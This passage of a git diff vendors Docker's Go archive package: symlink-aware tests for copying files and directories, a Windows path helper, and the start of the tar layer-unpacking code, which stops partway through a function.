to %q (follow symbol link)", srcPath, dstPath) + + return CopyResource(srcPath, dstPath, true) +} + +// Basic assumptions about SRC and DST: +// 1. SRC must exist. +// 2. If SRC ends with a trailing separator, it must be a directory. +// 3. DST parent directory must exist. +// 4. If DST exists as a file, it must not end with a trailing separator. + +// First get these easy error cases out of the way. + +// Test for error when SRC does not exist. +func TestCopyErrSrcNotExists(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + if _, err := CopyInfoSourcePath(filepath.Join(tmpDirA, "file1"), false); !os.IsNotExist(err) { + t.Fatalf("expected IsNotExist error, but got %T: %s", err, err) + } +} + +// Test for error when SRC ends in a trailing +// path separator but it exists as a file. +func TestCopyErrSrcNotDir(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A with some sample files and directories. + createSampleDir(t, tmpDirA) + + if _, err := CopyInfoSourcePath(joinTrailingSep(tmpDirA, "file1"), false); !isNotDir(err) { + t.Fatalf("expected IsNotDir error, but got %T: %s", err, err) + } +} + +// Test for error when SRC is a valid file or directory, +// but the DST parent directory does not exist. +func TestCopyErrDstParentNotExists(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A with some sample files and directories. + createSampleDir(t, tmpDirA) + + srcInfo := CopyInfo{Path: filepath.Join(tmpDirA, "file1"), Exists: true, IsDir: false} + + // Try with a file source. + content, err := TarResource(srcInfo) + if err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + defer content.Close() + + // Copy to a file whose parent does not exist. 
+ if err = CopyTo(content, srcInfo, filepath.Join(tmpDirB, "fakeParentDir", "file1")); err == nil { + t.Fatal("expected IsNotExist error, but got nil instead") + } + + if !os.IsNotExist(err) { + t.Fatalf("expected IsNotExist error, but got %T: %s", err, err) + } + + // Try with a directory source. + srcInfo = CopyInfo{Path: filepath.Join(tmpDirA, "dir1"), Exists: true, IsDir: true} + + content, err = TarResource(srcInfo) + if err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + defer content.Close() + + // Copy to a directory whose parent does not exist. + if err = CopyTo(content, srcInfo, joinTrailingSep(tmpDirB, "fakeParentDir", "fakeDstDir")); err == nil { + t.Fatal("expected IsNotExist error, but got nil instead") + } + + if !os.IsNotExist(err) { + t.Fatalf("expected IsNotExist error, but got %T: %s", err, err) + } +} + +// Test for error when DST ends in a trailing +// path separator but exists as a file. +func TestCopyErrDstNotDir(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + // Try with a file source. + srcInfo := CopyInfo{Path: filepath.Join(tmpDirA, "file1"), Exists: true, IsDir: false} + + content, err := TarResource(srcInfo) + if err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + defer content.Close() + + if err = CopyTo(content, srcInfo, joinTrailingSep(tmpDirB, "file1")); err == nil { + t.Fatal("expected IsNotDir error, but got nil instead") + } + + if !isNotDir(err) { + t.Fatalf("expected IsNotDir error, but got %T: %s", err, err) + } + + // Try with a directory source. 
+ srcInfo = CopyInfo{Path: filepath.Join(tmpDirA, "dir1"), Exists: true, IsDir: true} + + content, err = TarResource(srcInfo) + if err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + defer content.Close() + + if err = CopyTo(content, srcInfo, joinTrailingSep(tmpDirB, "file1")); err == nil { + t.Fatal("expected IsNotDir error, but got nil instead") + } + + if !isNotDir(err) { + t.Fatalf("expected IsNotDir error, but got %T: %s", err, err) + } +} + +// Possibilities are reduced to the remaining 10 cases: +// +// case | srcIsDir | onlyDirContents | dstExists | dstIsDir | dstTrSep | action +// =================================================================================================== +// A | no | - | no | - | no | create file +// B | no | - | no | - | yes | error +// C | no | - | yes | no | - | overwrite file +// D | no | - | yes | yes | - | create file in dst dir +// E | yes | no | no | - | - | create dir, copy contents +// F | yes | no | yes | no | - | error +// G | yes | no | yes | yes | - | copy dir and contents +// H | yes | yes | no | - | - | create dir, copy contents +// I | yes | yes | yes | no | - | error +// J | yes | yes | yes | yes | - | copy dir contents +// + +// A. SRC specifies a file and DST (no trailing path separator) doesn't +// exist. This should create a file with the name DST and copy the +// contents of the source file into it. +func TestCopyCaseA(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A with some sample files and directories. 
+ createSampleDir(t, tmpDirA) + + srcPath := filepath.Join(tmpDirA, "file1") + dstPath := filepath.Join(tmpDirB, "itWorks.txt") + + var err error + + if err = testCopyHelper(t, srcPath, dstPath); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, srcPath, dstPath); err != nil { + t.Fatal(err) + } + os.Remove(dstPath) + + symlinkPath := filepath.Join(tmpDirA, "symlink3") + symlinkPath1 := filepath.Join(tmpDirA, "symlink4") + linkTarget := filepath.Join(tmpDirA, "file1") + + if err = testCopyHelperFSym(t, symlinkPath, dstPath); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { + t.Fatal(err) + } + os.Remove(dstPath) + if err = testCopyHelperFSym(t, symlinkPath1, dstPath); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { + t.Fatal(err) + } +} + +// B. SRC specifies a file and DST (with trailing path separator) doesn't +// exist. This should cause an error because the copy operation cannot +// create a directory when copying a single file. +func TestCopyCaseB(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A with some sample files and directories. 
+ createSampleDir(t, tmpDirA) + + srcPath := filepath.Join(tmpDirA, "file1") + dstDir := joinTrailingSep(tmpDirB, "testDir") + + var err error + + if err = testCopyHelper(t, srcPath, dstDir); err == nil { + t.Fatal("expected ErrDirNotExists error, but got nil instead") + } + + if err != ErrDirNotExists { + t.Fatalf("expected ErrDirNotExists error, but got %T: %s", err, err) + } + + symlinkPath := filepath.Join(tmpDirA, "symlink3") + + if err = testCopyHelperFSym(t, symlinkPath, dstDir); err == nil { + t.Fatal("expected ErrDirNotExists error, but got nil instead") + } + if err != ErrDirNotExists { + t.Fatalf("expected ErrDirNotExists error, but got %T: %s", err, err) + } + +} + +// C. SRC specifies a file and DST exists as a file. This should overwrite +// the file at DST with the contents of the source file. +func TestCopyCaseC(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcPath := filepath.Join(tmpDirA, "file1") + dstPath := filepath.Join(tmpDirB, "file2") + + var err error + + // Ensure they start out different. + if err = fileContentsEqual(t, srcPath, dstPath); err == nil { + t.Fatal("expected different file contents") + } + + if err = testCopyHelper(t, srcPath, dstPath); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, srcPath, dstPath); err != nil { + t.Fatal(err) + } +} + +// C. Symbol link following version: +// SRC specifies a file and DST exists as a file. This should overwrite +// the file at DST with the contents of the source file. +func TestCopyCaseCFSym(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. 
+ createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + symlinkPathBad := filepath.Join(tmpDirA, "symlink1") + symlinkPath := filepath.Join(tmpDirA, "symlink3") + linkTarget := filepath.Join(tmpDirA, "file1") + dstPath := filepath.Join(tmpDirB, "file2") + + var err error + + // first to test broken link + if err = testCopyHelperFSym(t, symlinkPathBad, dstPath); err == nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + // test symbol link -> symbol link -> target + // Ensure they start out different. + if err = fileContentsEqual(t, linkTarget, dstPath); err == nil { + t.Fatal("expected different file contents") + } + + if err = testCopyHelperFSym(t, symlinkPath, dstPath); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { + t.Fatal(err) + } +} + +// D. SRC specifies a file and DST exists as a directory. This should place +// a copy of the source file inside it using the basename from SRC. Ensure +// this works whether DST has a trailing path separator or not. +func TestCopyCaseD(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcPath := filepath.Join(tmpDirA, "file1") + dstDir := filepath.Join(tmpDirB, "dir1") + dstPath := filepath.Join(dstDir, "file1") + + var err error + + // Ensure that dstPath doesn't exist. + if _, err = os.Stat(dstPath); !os.IsNotExist(err) { + t.Fatalf("did not expect dstPath %q to exist", dstPath) + } + + if err = testCopyHelper(t, srcPath, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, srcPath, dstPath); err != nil { + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. 
+ + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil { + t.Fatalf("unable to make dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "dir1") + + if err = testCopyHelper(t, srcPath, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, srcPath, dstPath); err != nil { + t.Fatal(err) + } +} + +// D. Symbol link following version: +// SRC specifies a file and DST exists as a directory. This should place +// a copy of the source file inside it using the basename from SRC. Ensure +// this works whether DST has a trailing path separator or not. +func TestCopyCaseDFSym(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcPath := filepath.Join(tmpDirA, "symlink4") + linkTarget := filepath.Join(tmpDirA, "file1") + dstDir := filepath.Join(tmpDirB, "dir1") + dstPath := filepath.Join(dstDir, "symlink4") + + var err error + + // Ensure that dstPath doesn't exist. + if _, err = os.Stat(dstPath); !os.IsNotExist(err) { + t.Fatalf("did not expect dstPath %q to exist", dstPath) + } + + if err = testCopyHelperFSym(t, srcPath, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. 
+ + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil { + t.Fatalf("unable to make dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "dir1") + + if err = testCopyHelperFSym(t, srcPath, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { + t.Fatal(err) + } +} + +// E. SRC specifies a directory and DST does not exist. This should create a +// directory at DST and copy the contents of the SRC directory into the DST +// directory. Ensure this works whether DST has a trailing path separator or +// not. +func TestCopyCaseE(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A with some sample files and directories. + createSampleDir(t, tmpDirA) + + srcDir := filepath.Join(tmpDirA, "dir1") + dstDir := filepath.Join(tmpDirB, "testDir") + + var err error + + if err = testCopyHelper(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, srcDir); err != nil { + t.Log("dir contents not equal") + logDirContents(t, tmpDirA) + logDirContents(t, tmpDirB) + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. + + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "testDir") + + if err = testCopyHelper(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, srcDir); err != nil { + t.Fatal(err) + } +} + +// E. Symbol link following version: +// SRC specifies a directory and DST does not exist. This should create a +// directory at DST and copy the contents of the SRC directory into the DST +// directory. 
Ensure this works whether DST has a trailing path separator or +// not. +func TestCopyCaseEFSym(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A with some sample files and directories. + createSampleDir(t, tmpDirA) + + srcDir := filepath.Join(tmpDirA, "dirSymlink") + linkTarget := filepath.Join(tmpDirA, "dir1") + dstDir := filepath.Join(tmpDirB, "testDir") + + var err error + + if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { + t.Log("dir contents not equal") + logDirContents(t, tmpDirA) + logDirContents(t, tmpDirB) + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. + + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "testDir") + + if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { + t.Fatal(err) + } +} + +// F. SRC specifies a directory and DST exists as a file. This should cause an +// error as it is not possible to overwrite a file with a directory. +func TestCopyCaseF(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. 
+ createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcDir := filepath.Join(tmpDirA, "dir1") + symSrcDir := filepath.Join(tmpDirA, "dirSymlink") + dstFile := filepath.Join(tmpDirB, "file1") + + var err error + + if err = testCopyHelper(t, srcDir, dstFile); err == nil { + t.Fatal("expected ErrCannotCopyDir error, but got nil instead") + } + + if err != ErrCannotCopyDir { + t.Fatalf("expected ErrCannotCopyDir error, but got %T: %s", err, err) + } + + // now test with symbol link + if err = testCopyHelperFSym(t, symSrcDir, dstFile); err == nil { + t.Fatal("expected ErrCannotCopyDir error, but got nil instead") + } + + if err != ErrCannotCopyDir { + t.Fatalf("expected ErrCannotCopyDir error, but got %T: %s", err, err) + } +} + +// G. SRC specifies a directory and DST exists as a directory. This should copy +// the SRC directory and all its contents to the DST directory. Ensure this +// works whether DST has a trailing path separator or not. +func TestCopyCaseG(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcDir := filepath.Join(tmpDirA, "dir1") + dstDir := filepath.Join(tmpDirB, "dir2") + resultDir := filepath.Join(dstDir, "dir1") + + var err error + + if err = testCopyHelper(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, resultDir, srcDir); err != nil { + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. 
+ + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil { + t.Fatalf("unable to make dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "dir2") + + if err = testCopyHelper(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, resultDir, srcDir); err != nil { + t.Fatal(err) + } +} + +// G. Symbol link version: +// SRC specifies a directory and DST exists as a directory. This should copy +// the SRC directory and all its contents to the DST directory. Ensure this +// works whether DST has a trailing path separator or not. +func TestCopyCaseGFSym(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcDir := filepath.Join(tmpDirA, "dirSymlink") + linkTarget := filepath.Join(tmpDirA, "dir1") + dstDir := filepath.Join(tmpDirB, "dir2") + resultDir := filepath.Join(dstDir, "dirSymlink") + + var err error + + if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, resultDir, linkTarget); err != nil { + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. + + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil { + t.Fatalf("unable to make dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "dir2") + + if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, resultDir, linkTarget); err != nil { + t.Fatal(err) + } +} + +// H. SRC specifies a directory's contents only and DST does not exist. 
This +// should create a directory at DST and copy the contents of the SRC +// directory (but not the directory itself) into the DST directory. Ensure +// this works whether DST has a trailing path separator or not. +func TestCopyCaseH(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A with some sample files and directories. + createSampleDir(t, tmpDirA) + + srcDir := joinTrailingSep(tmpDirA, "dir1") + "." + dstDir := filepath.Join(tmpDirB, "testDir") + + var err error + + if err = testCopyHelper(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, srcDir); err != nil { + t.Log("dir contents not equal") + logDirContents(t, tmpDirA) + logDirContents(t, tmpDirB) + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. + + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "testDir") + + if err = testCopyHelper(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, srcDir); err != nil { + t.Log("dir contents not equal") + logDirContents(t, tmpDirA) + logDirContents(t, tmpDirB) + t.Fatal(err) + } +} + +// H. Symbol link following version: +// SRC specifies a directory's contents only and DST does not exist. This +// should create a directory at DST and copy the contents of the SRC +// directory (but not the directory itself) into the DST directory. Ensure +// this works whether DST has a trailing path separator or not. +func TestCopyCaseHFSym(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A with some sample files and directories. + createSampleDir(t, tmpDirA) + + srcDir := joinTrailingSep(tmpDirA, "dirSymlink") + "." 
+ linkTarget := filepath.Join(tmpDirA, "dir1") + dstDir := filepath.Join(tmpDirB, "testDir") + + var err error + + if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { + t.Log("dir contents not equal") + logDirContents(t, tmpDirA) + logDirContents(t, tmpDirB) + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. + + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "testDir") + + if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { + t.Log("dir contents not equal") + logDirContents(t, tmpDirA) + logDirContents(t, tmpDirB) + t.Fatal(err) + } +} + +// I. SRC specifies a directory's contents only and DST exists as a file. This +// should cause an error as it is not possible to overwrite a file with a +// directory. +func TestCopyCaseI(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcDir := joinTrailingSep(tmpDirA, "dir1") + "." 
+ symSrcDir := filepath.Join(tmpDirB, "dirSymlink") + dstFile := filepath.Join(tmpDirB, "file1") + + var err error + + if err = testCopyHelper(t, srcDir, dstFile); err == nil { + t.Fatal("expected ErrCannotCopyDir error, but got nil instead") + } + + if err != ErrCannotCopyDir { + t.Fatalf("expected ErrCannotCopyDir error, but got %T: %s", err, err) + } + + // now try with symbol link of dir + if err = testCopyHelperFSym(t, symSrcDir, dstFile); err == nil { + t.Fatal("expected ErrCannotCopyDir error, but got nil instead") + } + + if err != ErrCannotCopyDir { + t.Fatalf("expected ErrCannotCopyDir error, but got %T: %s", err, err) + } +} + +// J. SRC specifies a directory's contents only and DST exists as a directory. +// This should copy the contents of the SRC directory (but not the directory +// itself) into the DST directory. Ensure this works whether DST has a +// trailing path separator or not. +func TestCopyCaseJ(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcDir := joinTrailingSep(tmpDirA, "dir1") + "." + dstDir := filepath.Join(tmpDirB, "dir5") + + var err error + + // first to create an empty dir + if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil { + t.Fatalf("unable to make dstDir: %s", err) + } + + if err = testCopyHelper(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, srcDir); err != nil { + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. 
+ + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil { + t.Fatalf("unable to make dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "dir5") + + if err = testCopyHelper(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, srcDir); err != nil { + t.Fatal(err) + } +} + +// J. Symbol link following version: +// SRC specifies a directory's contents only and DST exists as a directory. +// This should copy the contents of the SRC directory (but not the directory +// itself) into the DST directory. Ensure this works whether DST has a +// trailing path separator or not. +func TestCopyCaseJFSym(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcDir := joinTrailingSep(tmpDirA, "dirSymlink") + "." + linkTarget := filepath.Join(tmpDirA, "dir1") + dstDir := filepath.Join(tmpDirB, "dir5") + + var err error + + // first to create an empty dir + if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil { + t.Fatalf("unable to make dstDir: %s", err) + } + + if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. 
+ + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil { + t.Fatalf("unable to make dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "dir5") + + if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/pkg/archive/copy_windows.go b/vendor/github.com/docker/docker/pkg/archive/copy_windows.go new file mode 100644 index 0000000000..2b775b45c4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/copy_windows.go @@ -0,0 +1,9 @@ +package archive + +import ( + "path/filepath" +) + +func normalizePath(path string) string { + return filepath.FromSlash(path) +} diff --git a/vendor/github.com/docker/docker/pkg/archive/diff.go b/vendor/github.com/docker/docker/pkg/archive/diff.go new file mode 100644 index 0000000000..9e1a58c499 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/diff.go @@ -0,0 +1,279 @@ +package archive + +import ( + "archive/tar" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/system" +) + +// UnpackLayer unpack `layer` to a `dest`. The stream `layer` can be +// compressed or uncompressed. +// Returns the size in bytes of the contents of the layer. 
+func UnpackLayer(dest string, layer io.Reader, options *TarOptions) (size int64, err error) { + tr := tar.NewReader(layer) + trBuf := pools.BufioReader32KPool.Get(tr) + defer pools.BufioReader32KPool.Put(trBuf) + + var dirs []*tar.Header + unpackedPaths := make(map[string]struct{}) + + if options == nil { + options = &TarOptions{} + } + if options.ExcludePatterns == nil { + options.ExcludePatterns = []string{} + } + remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps) + if err != nil { + return 0, err + } + + aufsTempdir := "" + aufsHardlinks := make(map[string]*tar.Header) + + if options == nil { + options = &TarOptions{} + } + // Iterate through the files in the archive. + for { + hdr, err := tr.Next() + if err == io.EOF { + // end of tar archive + break + } + if err != nil { + return 0, err + } + + size += hdr.Size + + // Normalize name, for safety and for a simple is-root check + hdr.Name = filepath.Clean(hdr.Name) + + // Windows does not support filenames with colons in them. Ignore + // these files. This is not a problem though (although it might + // appear that it is). Let's suppose a client is running docker pull. + // The daemon it points to is Windows. Would it make sense for the + // client to be doing a docker pull Ubuntu for example (which has files + // with colons in the name under /usr/share/man/man3)? No, absolutely + // not as it would really only make sense that they were pulling a + // Windows image. However, for development, it is necessary to be able + // to pull Linux images which are in the repository. + // + // TODO Windows. Once the registry is aware of what images are Windows- + // specific or Linux-specific, this warning should be changed to an error + // to cater for the situation where someone does manage to upload a Linux + // image but have it tagged as Windows inadvertently. 
+ if runtime.GOOS == "windows" { + if strings.Contains(hdr.Name, ":") { + logrus.Warnf("Windows: Ignoring %s (is this a Linux image?)", hdr.Name) + continue + } + } + + // Note as these operations are platform specific, so must the slash be. + if !strings.HasSuffix(hdr.Name, string(os.PathSeparator)) { + // Not the root directory, ensure that the parent directory exists. + // This happened in some tests where an image had a tarfile without any + // parent directories. + parent := filepath.Dir(hdr.Name) + parentPath := filepath.Join(dest, parent) + + if _, err := os.Lstat(parentPath); err != nil && os.IsNotExist(err) { + err = system.MkdirAll(parentPath, 0600) + if err != nil { + return 0, err + } + } + } + + // Skip AUFS metadata dirs + if strings.HasPrefix(hdr.Name, WhiteoutMetaPrefix) { + // Regular files inside /.wh..wh.plnk can be used as hardlink targets + // We don't want this directory, but we need the files in them so that + // such hardlinks can be resolved. + if strings.HasPrefix(hdr.Name, WhiteoutLinkDir) && hdr.Typeflag == tar.TypeReg { + basename := filepath.Base(hdr.Name) + aufsHardlinks[basename] = hdr + if aufsTempdir == "" { + if aufsTempdir, err = ioutil.TempDir("", "dockerplnk"); err != nil { + return 0, err + } + defer os.RemoveAll(aufsTempdir) + } + if err := createTarFile(filepath.Join(aufsTempdir, basename), dest, hdr, tr, true, nil, options.InUserNS); err != nil { + return 0, err + } + } + + if hdr.Name != WhiteoutOpaqueDir { + continue + } + } + path := filepath.Join(dest, hdr.Name) + rel, err := filepath.Rel(dest, path) + if err != nil { + return 0, err + } + + // Note as these operations are platform specific, so must the slash be. 
+ if strings.HasPrefix(rel, ".."+string(os.PathSeparator)) { + return 0, breakoutError(fmt.Errorf("%q is outside of %q", hdr.Name, dest)) + } + base := filepath.Base(path) + + if strings.HasPrefix(base, WhiteoutPrefix) { + dir := filepath.Dir(path) + if base == WhiteoutOpaqueDir { + _, err := os.Lstat(dir) + if err != nil { + return 0, err + } + err = filepath.Walk(dir, func(path string, info os.FileInfo, err error) error { + if err != nil { + if os.IsNotExist(err) { + err = nil // parent was deleted + } + return err + } + if path == dir { + return nil + } + if _, exists := unpackedPaths[path]; !exists { + err := os.RemoveAll(path) + return err + } + return nil + }) + if err != nil { + return 0, err + } + } else { + originalBase := base[len(WhiteoutPrefix):] + originalPath := filepath.Join(dir, originalBase) + if err := os.RemoveAll(originalPath); err != nil { + return 0, err + } + } + } else { + // If path exits we almost always just want to remove and replace it. + // The only exception is when it is a directory *and* the file from + // the layer is also a directory. Then we want to merge them (i.e. + // just apply the metadata from the layer). 
